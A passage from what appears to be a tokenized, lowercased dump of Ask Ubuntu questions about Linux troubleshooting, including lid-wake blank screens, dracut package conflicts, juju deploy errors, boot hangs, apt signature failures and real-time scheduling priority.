snd_hda_codec_hdmi , snd_hda_intel uvcvideo 76750 0 snd_hwdep 17699 1 snd_hda_codec snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec radeon 895730 4 snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi videobuf2_core 32852 1 uvcvideo snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event videodev 120310 2 uvcvideo , videobuf2_core snd_timer 29426 2 snd_pcm , snd_seq videobuf2_vmalloc 12861 1 uvcvideo snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq ttm 83596 1 radeon videobuf2_memops 13405 1 videobuf2_vmalloc joydev 17458 0 kvm 414071 0 drm_kms_helper 49113 1 radeon snd 78921 20 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device drm 288721 6 radeon , ttm , drm_kms_helper soundcore 15048 1 snd psmouse 95595 0 snd_page_alloc 18485 2 snd_hda_intel , snd_pcm ghash_clmulni_intel 13221 0 aesni_intel 51038 0 cryptd 20404 2 ghash_clmulni_intel , aesni_intel k10temp 13127 0 video 19336 0 serio_raw 13216 0 aes_x86_64 17256 1 aesni_intel hp_wmi 18049 0 hp_accel 25977 0 sparse_keymap 13891 1 hp_wmi lis3lv02d 19830 1 hp_accel i2c_piix4 13168 0 i2c_algo_bit 13414 1 radeon microcode 22804 0 mac_hid 13206 0 wmi 19071 1 hp_wmi input_polldev 13897 1 lis3lv02d binfmt_misc 17501 1 lp 17760 0 parport 46346 3 parport_pc , ppdev , lp usb_storage 48839 0 hid_generic 12541 0 usbhid 46987 0 hid 100411 2 hid_generic , usbhid r8169 61651 0 ifconfig : eth0 link encap : ethernet hwaddr 84:34:97:17:5c:68 inet addr:192.168.0.109 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :8634:97ff : fe17:5c68/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15167 errors:0 dropped:0 overruns:0 frame:0 tx packets:13460 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:11265410 ( 11.2 mb ) tx bytes:1827803 ( 1.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:45 errors:0 dropped:0 overruns:0 frame:0 tx packets:45 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5670 ( 5.6 kb ) tx bytes:5670 ( 5.6 kb ) sorry about that . i am still trying to get a hold of all this . william @ william-hp-sleekbook : ~ $ lspci -nnk | grep -iea3 `` ( wireless|network ) '' 02:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ] subsystem : hewlett-packard company device [ 103c:18ec ] 02:00.1 bluetooth [ 0d11 ] : ralink corp. device [ 1814:3298 ] subsystem : hewlett-packard company device [ 103c:18ec ] hope this is what you were after . thanks !
248967	laptop screen stays blank after lid is reopened	i have an acer aspire one kav60 . beginning with 11.10 through 12.10 , every version of ubuntu causes the screen to stay blank after i open the lid . the only way i can get out of the problem is a hard restart . hitting the esc key or left mouse button causes the screen to flash on for a fraction of a second and i can see a working display when this happens , but i ca n't keep it on with any keystroke combination i have tried . i have turned off all power saving options , disabled standby , and selected do nothing when the lid is closed . nothing has any effect . to avoid this problem ( which often results in lost data if the lid is accidently closed before a program save ) i have to stay with 11.04 even though it is now no longer supported . there seem to be some bug fixes shown for this problem , but they specify non-intel graphics cards . my laptop has an on-board intel video driver . under any circumstances , there seems to be no timeframe for fixing the bugs that are shown to exist . any suggestions will be greatly appreciated .
248970	how to install dracut on ubuntu ?	i just tried to install dracut , a replacement for the initramfs-tools on a fresh ubuntu 12.10 server to use the advanced features of dracut for booting from nfs over two bonded interfaces . unfortunately the installation encountered the following conflict : root @ ubuntu : ~ # aptitude install dracut the following new packages will be installed : cryptsetup { a } cryptsetup-bin { a } dmraid { a } dracut { b } kpartx { a } kpartx-boot { a } libcryptsetup4 { a } libdevmapper-event1.02.1 { a } libdmraid1.0.0.rc16 { a } libreadline5 { a } lvm2 { a } mdadm { a } postfix { a } ssl-cert { a } watershed { a } 0 packages upgraded , 15 newly installed , 0 to remove and 2 not upgraded . need to get 3,004 kb of archives . after unpacking 8,428 kb will be used . the following packages have unmet dependencies : dracut : conflicts : initramfs-tools but 0.103ubuntu0.2 is installed . conflicts : initramfs-tools : i386 which is a virtual package . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) dracut [ not installed ] accept this solution ? [ y/n/q/ ? ] the proposed solution `` dracut [ not installed ] '' does not help . unfortunately i did n't find much information on dracut on ubuntu so that i could identify if it should work . i found the following bug report in debian which is unsolved until now : http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=669342 i quickly tested the installation of dracut on a ubuntu 12.04 server and it installed fine , but i need it for ubuntu 12.10 . i already tried to force dpkg to ignore the conflicts , but the result was the same aptitude -o dpkg : :options : := '' -- force-conflicts '' install dracut installing dracut from source is working , but to include network setup in the initramfs , the package dracut-network is needed which i could n't find the sources for and even so it 's available in ubuntu 12.10 it depends on the dracut package ... can someone help me how to install dracut and maybe share some insides on why it 's so hard to use dracut in ubuntu ?
248971	ubuntu on micromax funbook pro with cortex a8 processor	i am using micomax funbook pro tab with comes with cortex a8 ( 1.2ghz ) processor and 1gb ram . it runs android 4.0 scecream sandwich . i am willing to use ubuntu on it . is there anyway i can do so .
248972	how can i disable backlight when i lock the screen ?	when i lock screen , the display does turn black but the display is n't completely off . there is some light coming out of the display in screen lock mode but it get turned off when inactive for 10 minutes as configured from brightness and lock setting . i tried xset dpms force off which completely turn off the display . is there any way that when i press ctrl + alt + l to lock screen , the screen get locked and the display is completely turned off saving some power .
248976	problem with juju hadoop deploy	i 've run into a problem deploying the juju hadoop charm . juju bootstrap works fine , but when i use juju deploy hadoop hadoop-master , i get an install error . juju status gives me : machines : 0 : agent-state : running dns-name : localhost instance-id : local instance-state : running services : hadoop-master : charm : cs : precise/hadoop-5 relations : { } units : hadoop-master/0 : agent-state : install-error machine : 0 public-address : xx.x.x.xxx here is my juju debug-log : 2013-01-29 07:35:44,689 unit : hadoop-master/0 : hook.output info : ldconfig deferred processing now taking place 2013-01-29 07:35:45,208 unit : hadoop-master/0 : hook.output info : errors were encountered while processing : grub-pc 2013-01-29 07:35:45,220 unit : hadoop-master/0 : hook.output info : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 2013-01-29 07:35:45,223 unit : hadoop-master/0 : hook.output debug : hook install exited , exit code traceback ( most recent call last ) : failure : juju.errors.charminvocationerror : error processing '/var/lib/juju/units/hadoop-master-0/charm/hooks/install ' : exit code 100. . 2013-01-29 07:35:45,223 unit : hadoop-master/0 : hook.executor debug : hook error : /var/lib/juju/units/hadoop-master-0/charm/hooks/install error processing '/var/lib/juju/units/hadoop-master-0/charm/hooks/install ' : exit code 100 . 2013-01-29 07:35:45,224 unit : hadoop-master/0 : statemachine debug : unitworkflowstate : executing error transition error_install , error processing '/var/lib/juju/units/hadoop-master-0/charm/hooks/install ' : exit code 100 . 2013-01-29 07:35:45,582 unit : hadoop-master/0 : statemachine debug : unitworkflowstate : transition error_install ( none - > install_error ) { } 2013-01-29 07:35:45,630 unit : hadoop-master/0 : statemachine debug : unitworkflowstate : transition complete error_install ( state install_error ) { } 2013-01-29 07:35:45,659 unit : hadoop-master/0 : juju.agents.unit debug : configuration changed 2013-01-29 07:35:45,659 unit : hadoop-master/0 : juju.agents.unit debug : configuration updated on service in a non-started state 2013-01-29 07:35:45,730 unit : hadoop-master/0 : juju.agents.unit info : no upgrade flag set . what 's the fix ?
248986	ubuntu 12.04 lts no longer able to boot normally	until recently , i was able to boot into 12.04 lts without any problems . now , after the splash screen ( the one that says ubuntu with the 5 dots below it ) , i get a plain black screen , and nothing happens . the backlight is on ( i can tell because i can switch it off using function keys on the laptop ) . i tried booting into recovery mode . from there , i selected `` enable networking '' . i see a lot of text messages on the screen , the last of which is something like : fsck from util-linux 2.20.1 /dev/sda7 : clean 503648/5873664 files , 16228870/2348972 blocks after that , nothing happens . in desperation , i hit ctrl+c and see this : the disk drive for / is not ready yet or is not present while this does n't sound good , after a few seconds ubuntu boots and i 'm able to use it normally . what 's going on here , and how can i get ubuntu to boot properly without having to go through the recovery mode ? below are some relevant files : /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 mtpfs /mnt/nexus7 fuse user , noauto , allow_other , defaults 0 0 # / was on /dev/sda7 during installation uuid=d67a32d7-aeb2-499c-b854-5a5588ab44d0 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=37aa594e-d42b-4104-8ceb-8bf5f535fbbc none swap sw 0 0 /var/log/dmesg : http : //pastebin.com/jg6pj6vs the interesting part of dmesg appears to be around the 40 second mark ( line 929 ) -- this is approximately the time that i hit ctrl+c : [ 41.431376 ] init : friendly-recovery main process ( 1136 ) killed by int signal [ 41.832821 ] lp : driver loaded but no devices found [ 53.659693 ] adding 4028412k swap on /dev/sda6 . priority : -1 extents:1 across:4028412k [ 54.017887 ] ext4-fs ( sda7 ) : re-mounted . opts : errors=remount-ro [ 54.123538 ] init : udev-fallback-graphics main process ( 2043 ) terminated with status 1 [ 54.266949 ] init : failsafe main process ( 2086 ) killed by term signal [ 54.313791 ] init : friendly-recovery post-stop process ( 1323 ) terminated with status 1 it seems like some processes are hanging and preventing the normal boot . perhaps when i hit ctrl+c , those processes are killed and boot can continue . how can i find out what those processes are , given their ids ( the numbers in the parentheses ) ? /var/log/boot.log : begin : loading essential drivers ... done . begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . begin : running /scripts/local-premount ... done . begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . fsck from util-linux 2.20.1 /dev/sda7 : clean , 503673/5873664 files , 16231307/23489792 blocks initctl : event failed modem-manager [ 2121 ] : < info > modemmanager ( version 0.5.2.0 ) starting ... modem-manager [ 2121 ] : < info > loaded plugin nokia modem-manager [ 2121 ] : < info > loaded plugin zte modem-manager [ 2121 ] : < info > loaded plugin huawei modem-manager [ 2121 ] : < info > loaded plugin sierra modem-manager [ 2121 ] : < info > loaded plugin motoc modem-manager [ 2121 ] : < info > loaded plugin simtech modem-manager [ 2121 ] : < info > loaded plugin wavecom modem-manager [ 2121 ] : < info > loaded plugin x22x modem-manager [ 2121 ] : < info > loaded plugin novatel modem-manager [ 2121 ] : < info > loaded plugin option high-speed modem-manager [ 2121 ] : < info > loaded plugin option modem-manager [ 2121 ] : < info > loaded plugin samsung modem-manager [ 2121 ] : < info > loaded plugin linktop modem-manager [ 2121 ] : < info > loaded plugin ericsson mbm modem-manager [ 2121 ] : < info > loaded plugin gobi modem-manager [ 2121 ] : < info > loaded plugin generic modem-manager [ 2121 ] : < info > loaded plugin longcheer modem-manager [ 2121 ] : < info > loaded plugin anydata * starting system logging daemon [ ok ] * starting mdns/dns-sd daemon [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting bluetooth daemon [ ok ] * starting apparmor profiles [ ok ] * setting sensors limits [ ok ] * stopping system v initialisation compatibility [ ok ] * starting system v runlevel compatibility [ ok ] * starting crash report submission daemon [ ok ] * starting lightdm display manager [ ok ] * starting anac ( h ) ronistic cron [ ok ] * starting save kernel messages [ ok ] * starting automatic crash report generation [ ok ] * starting acpi daemon [ ok ] * starting regular background program processing daemon [ ok ] * starting deferred execution scheduler [ ok ] * starting cpu interrupts balancing daemon [ ok ] * stopping save kernel messages [ ok ] i forced a file system check on boot ( http : //ubuntuforums.org/showthread.php ? t=77771 ) and it did not find any errors . what else could be wrong ? edit i tried booting into older versions of the kernel . i have 2 other versions accessible from the boot loader : 3.2.0-31-generic 3.2.0-29-generic 3.2.0-31 does n't work ( same problem ) , but 3.2.0-29 works ! does this mean that there is a bug in the kernel ? edit i followed the instructions at https : //wiki.ubuntu.com/debuggingkernelboot to diagnose my problem . i updated the boot options as instructed : removed quiet , splash , $ vt_handoff replaced $ linux_gfx_mode with text the system booted correctly ! after more fiddling , i determined that the quiet , splash and $ vt_handoff are irrelevant -- replacing $ linux_gfx_mode with text is what 's fixing the problem . what 's going on here ? where exactly does the bug live ?
248988	aptitude cant install ia32-libs	when i run aptitude install ia32-libs it gives me this output ( on pastebin due to length constraints of stackexchange ) . the install fails , as it leaves ia32-libs in a not installed state . all other solutions that it suggests to me are pretty useless too . i 've tried purging every ppa and reverting to default repositories of ubuntu , but it did n't help . could you help me ? update this is the output of apt-get install ia32-libs-multiarch . as it seems , apt-get tries to be less `` smart '' compared to aptitude , and it prints a more comprehensive output . i tried to manually install one of the packages that it recalls , gstreamer0.10-plugins-good : i386 , but it lead to installing libpixman-1-0 : i386 , and as you can see there , it basically tries to remove everything that is installed on my machine ! what 's going on ?
248989	cant update on fresh ubuntu install ?	just reinstalled ubuntu 12.04 lts and when i try to update i get this ? w : gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //gb.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : conflicting distribution : http : //gb.archive.ubuntu.com precise-updates release ( expected precise-updates but got precise ) w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg rename failed , no such file or directory ( - > /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-backports_release.gpg ) . w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . any ideas ? thanks in advance : ) i also cant open the software centre as it closes as soon as it opens with no error message and my update manager gives me this message : could not initialise the package information an unresolvable problem occurred while initialising the package information . please report this bug for the 'update-manager ' package and try to include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . ' by doing this : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update i think i have reduced the error message down to : w : gpg error : http : //gb.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : conflicting distribution : http : //gb.archive.ubuntu.com precise-updates release ( expected precise-updates but got precise ) e : gpg error : http : //gb.archive.ubuntu.com precise-backports release : the following signatures were invalid : nodata 1 nodata 2 and both update manage and software centre will now open but will not download still . software centre shows the name and picture of apps and says `` available from `` universe '' source '' and has a box saying use this source . the update manager shows size of all updates as 0kb and gives this message on clicking update - '' previous installation has n't been completed the installation could have failed because of an error in the corresponding software package or it was cancelled in an unfriendly way . you have to repair this before you can install or remove any further software.previous installation has n't been completed `` with this error details - e : the package index files are corrupted . no filename : field for package tzdata .
248990	how to search the location of shell script	# 59 23 * * 1 sh /rsync01.sh # 59 23 * * 2 sh /rsync02.sh # 59 23 * * 3 sh /rsync03.sh # 59 23 * * 4 sh /rsync04.sh # 59 23 * * 5 sh /rsync05.sh # 59 23 * * 6 sh /rsync06.sh # 59 23 * * 0 sh /rsync07.sh * * * * 6 sh /z_saturday.sh * * * * 6 sh /z_saturday1.sh * * * * 6 sh /z_saturday2.sh * * * * 1-5 sh /up_to_0200h.sh * * * * 1-5 sh /up_to_0300h.sh * * * * 1-5 sh /up_to_0400h.sh * * * * 1-5 sh /up_to_0500h.sh * * * * 1-5 sh /up_to_0600h.sh * * * * 1-5 sh /up_to_0630h.sh * * * * 1-5 sh /up_to_0700h.sh * * * * 1-5 sh /up_to_0730h.sh * * * * 1-5 sh /after_0730h.sh** my boss wants that i copy the shell script and paste the data in a new script . but i do n't know how to search this file and how to edit it please guide me .
248992	how to create an image of an entire remote system for using on other ( virtual ) remote machines ?	i have ordered several virtual machines from a hosting provider , which all need exactly the same setup : same users same programs installed same config ( except for hostname ) including cron-jobs is it possible and save to create a tarball of my entire system , excluding /dev , /proc , /sys folders and the /etc/hostname file and just unpack it on the disk while the system is not running ( using a repair mode , or a live cd , in case of a physical server ) ? what else do i have to consider ? edit : since i have no physical access to these machines , everything has to be done from the command line . edit 2 : also /etc/network/interfaces should not be copied .
248994	howto handle packaging and development in one git repository ?	from my point of view at the moment git-buildpackage is only intended for using upstream sources which are not in the same repository . i already have a git-buildpackage repository with the branches `` master '' , `` upstream and a tags from the initial import via git-import-orig . i cant find a howto , to have a development branch in the repository and import the changes from there into the upstream branch and make it buildable by git-buildpackage . i think the answer lies behind the steps git-import-orig does with the repository , which i dont know yet . any suggestions about having one repository which is git-buildpacke compliant and can be used to
248996	howto use apt-cacher-ng only when available ?	i 'm using apt-cacher-ng at my local network with the following configuration on the clients : acquire : :http { proxy `` http : //acng-host:3142 '' ; } ; some of the clients are laptops , so how do i configure them to use the cache only when it 's available on this network ?
249005	microphone recording through flashplayer on ubuntu	my usb headset and my usb webcam are functioning normally . i can use skype without any problem . however , even when i allow flash to record through my webcam and microphone ( http : //www.macromedia.com/support/documentation/fr/flashplayer/help/settings_manager.html ) , still i ca n't record my voice over the mic in any flash app . video through the webcam and sound output in the headset are ok . i have read the following posts , but there was no usefull answer : unable to change the flash microphone settings is there no support for microphone recording in flash player for linux ? thank you for your help .
249006	ubuntu laptop to win7 laptop music transfer	what is the easiest way to connect my ubuntu laptop to a win7 laptop to pull music and pics off the win7 laptop ? i installed ubuntu on my new computer as the primary os and i want to pull my music , pics and some docs off my old one in the easiest way possible .
249007	turning off hp folio 9470 touchpad	i am trying to find out if there is a hot key to turn off the touchpad when using an external mouse . in windows i just double tap in the upper left hand corner and it disables the touchpad . makes it nice when typing a long document or using an external mouse .
249017	what priority to use calling sched_setscheduler	i am writing a server that i do not want preempted by any other user process or `` low priority '' kernel process . i 'm using code like this : struct sched_param sched_param ; memset ( & sched_param , 0 , sizeof ( sched_param ) ) ; sched_param.sched_priority = some_priority ; if ( -1 == sched_setscheduler ( 0 , sched_fifo , & sched_param ) ) { // ... my problem is that when i set some_priority to be 99 ( the max value ) , it appears that i starve out even the scheduler process , and my system quickly becomes unusable ( the server process has a busywait loop at its core -- i have no control over tihs aspect , it 's a third party library ) . so my question is , what value for some_priority can i use to only allow preemption by the scheduler ( and possibly some small subset of kernel services ) ?
249026	live streaming from ubuntu 12.10 amd64	i know that webcamstudio live exists still even though it is not developed anymore . i tried to install the .deb package on ubuntu 12.04 amd64 . but gstreamer0.10-plugins-ugly-multiverse is missing from the repository . so what i am asking is if there are any alternatives to webcamstudio which work on ubuntu 12.10 amd64 ?
249027	disk has many bad sectors	i 've just installed ubuntu on my pc for the second time . when it started , i got a message about how bad my disk status is . after a short investigation , i found whats the problem exactly . it says : reallocated sector count : warning normalized 100 worst 100 treshold 50 value 498 sectors current spending sector count : warning normalized 100 worst 1 treshold 0 value 1 sector the others are fine ( good or n/a ) i dont know what does this data means , and i 'll be honest - i dont really want to know ... but what i want to know if there is any chance i can fix this manually , or when the crash comes in , i can just throw out my hard drive . if it counts , its a toshiba mk2018gap 20 gb hard disk , and its really , really old . i installed ubuntu 9.11 on it . thanks for helping me any way you can , if you can . have a good day !
249030	error while trying to do sudo apt-get update	i 'm not able to do sudo apt-get update in ubuntu 10.10 here is my error hit http : //dl.google.com stable release.gpg ign http : //dl.google.com/linux/chrome/deb/ stable/main translation-en ign http : //dl.google.com/linux/chrome/deb/ stable/main translation-en_in get:1 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/fkrull/deadsnakes/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/fkrull/deadsnakes/ubuntu/ maverick/main translation-en_in hit http : //dl.google.com stable release.gpg ign http : //dl.google.com/linux/talkplugin/deb/ stable/main translation-en ign http : //archive.ubuntu.com maverick release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/main translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick/restricted translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick/universe translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/universe translation-en_in ign http : //archive.ubuntu.com maverick-updates release.gpg hit http : //archive.canonical.com maverick release.gpg ign http : //dl.google.com/linux/talkplugin/deb/ stable/main translation-en_in hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/kamalmostafa/linux-kamal-mjgbacklight/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/kamalmostafa/linux-kamal-mjgbacklight/ubuntu/ maverick/main translation-en_in hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/sun-java-community-team/sun-java6/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/sun-java-community-team/sun-java6/ubuntu/ maverick/main translation-en_in hit http : //dl.google.com stable release get:2 http : //ppa.launchpad.net maverick release [ 9,762b ] ign http : //ppa.launchpad.net maverick release hit http : //dl.google.com stable release ign http : //extras.ubuntu.com maverick release.gpg ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en hit http : //archive.canonical.com maverick release hit http : //dl.google.com stable/main i386 packages hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en hit http : //archive.canonical.com maverick/partner sources ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en_in ign http : //ppa.launchpad.net maverick/main sources/diffindex ign http : //extras.ubuntu.com maverick release ign http : //ppa.launchpad.net maverick/main i386 packages/diffindex ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en_in hit http : //dl.google.com stable/main i386 packages hit http : //toolbelt.heroku.com ./ release.gpg ign http : //archive.ubuntu.com maverick-security release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick-security/main translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/main translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en ign http : //toolbelt.heroku.com/ubuntu/ ./ translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick-security/restricted translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/restricted translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick-security/universe translation-en ign http : //toolbelt.heroku.com/ubuntu/ ./ translation-en_in ign http : //archive.ubuntu.com/ubuntu/ maverick-security/universe translation-en_in ign http : //archive.ubuntu.com maverick release ign http : //archive.ubuntu.com maverick-updates release ign http : //archive.ubuntu.com maverick-security release ign http : //archive.ubuntu.com maverick/main sources/diffindex ign http : //archive.ubuntu.com maverick/restricted sources/diffindex ign http : //archive.ubuntu.com maverick/universe sources/diffindex ign http : //archive.ubuntu.com maverick/multiverse sources/diffindex ign http : //archive.ubuntu.com maverick/main i386 packages/diffindex ign http : //archive.ubuntu.com maverick/restricted i386 packages/diffindex ign http : //archive.ubuntu.com maverick/universe i386 packages/diffindex ign http : //archive.ubuntu.com maverick/multiverse i386 packages/diffindex ign http : //archive.ubuntu.com maverick-updates/main sources/diffindex ign http : //archive.ubuntu.com maverick-updates/restricted sources/diffindex ign http : //archive.ubuntu.com maverick-updates/universe sources/diffindex ign http : //archive.ubuntu.com maverick-updates/multiverse sources/diffindex ign http : //archive.ubuntu.com maverick-updates/main i386 packages/diffindex ign http : //archive.ubuntu.com maverick-updates/restricted i386 packages/diffindex ign http : //archive.ubuntu.com maverick-updates/universe i386 packages/diffindex ign http : //archive.ubuntu.com maverick-updates/multiverse i386 packages/diffindex ign http : //archive.ubuntu.com maverick-security/main sources/diffindex ign http : //archive.ubuntu.com maverick-security/restricted sources/diffindex hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages ign http : //archive.ubuntu.com maverick-security/universe sources/diffindex ign http : //archive.ubuntu.com maverick-security/multiverse sources/diffindex ign http : //archive.ubuntu.com maverick-security/main i386 packages/diffindex ign http : //archive.ubuntu.com maverick-security/restricted i386 packages/diffindex ign http : //archive.ubuntu.com maverick-security/universe i386 packages/diffindex ign http : //archive.ubuntu.com maverick-security/multiverse i386 packages/diffindex ign http : //archive.ubuntu.com maverick/main sources ign http : //archive.ubuntu.com maverick/restricted sources hit http : //toolbelt.heroku.com ./ release ign http : //archive.ubuntu.com maverick/universe sources ign http : //archive.ubuntu.com maverick/multiverse sources ign http : //archive.ubuntu.com maverick/main i386 packages ign http : //archive.ubuntu.com maverick/restricted i386 packages ign http : //archive.ubuntu.com maverick/universe i386 packages ign http : //archive.ubuntu.com maverick/multiverse i386 packages ign http : //archive.ubuntu.com maverick-updates/main sources ign http : //archive.ubuntu.com maverick-updates/restricted sources ign http : //archive.ubuntu.com maverick-updates/universe sources ign http : //archive.ubuntu.com maverick-updates/multiverse sources ign http : //extras.ubuntu.com maverick/main sources/diffindex ign http : //archive.ubuntu.com maverick-updates/main i386 packages ign http : //archive.ubuntu.com maverick-updates/restricted i386 packages ign http : //archive.ubuntu.com maverick-updates/universe i386 packages ign http : //archive.ubuntu.com maverick-updates/multiverse i386 packages ign http : //extras.ubuntu.com maverick/main i386 packages/diffindex ign http : //archive.ubuntu.com maverick-security/main sources ign http : //archive.ubuntu.com maverick-security/restricted sources ign http : //archive.ubuntu.com maverick-security/universe sources ign http : //archive.ubuntu.com maverick-security/multiverse sources ign http : //archive.ubuntu.com maverick-security/main i386 packages ign http : //archive.ubuntu.com maverick-security/restricted i386 packages ign http : //archive.ubuntu.com maverick-security/universe i386 packages ign http : //archive.ubuntu.com maverick-security/multiverse i386 packages ign http : //toolbelt.heroku.com ./ packages ign http : //extras.ubuntu.com maverick/main sources ign http : //archive.ubuntu.com maverick/main sources ign http : //archive.ubuntu.com maverick/restricted sources ign http : //archive.ubuntu.com maverick/universe sources ign http : //archive.ubuntu.com maverick/multiverse sources ign http : //archive.ubuntu.com maverick/main i386 packages ign http : //archive.ubuntu.com maverick/restricted i386 packages ign http : //archive.ubuntu.com maverick/universe i386 packages ign http : //archive.ubuntu.com maverick/multiverse i386 packages ign http : //extras.ubuntu.com maverick/main i386 packages ign http : //archive.ubuntu.com maverick-updates/main sources ign http : //archive.ubuntu.com maverick-updates/restricted sources ign http : //archive.ubuntu.com maverick-updates/universe sources ign http : //archive.ubuntu.com maverick-updates/multiverse sources ign http : //archive.ubuntu.com maverick-updates/main i386 packages ign http : //extras.ubuntu.com maverick/main sources ign http : //archive.ubuntu.com maverick-updates/restricted i386 packages ign http : //archive.ubuntu.com maverick-updates/universe i386 packages ign http : //archive.ubuntu.com maverick-updates/multiverse i386 packages ign http : //archive.ubuntu.com maverick-security/main sources 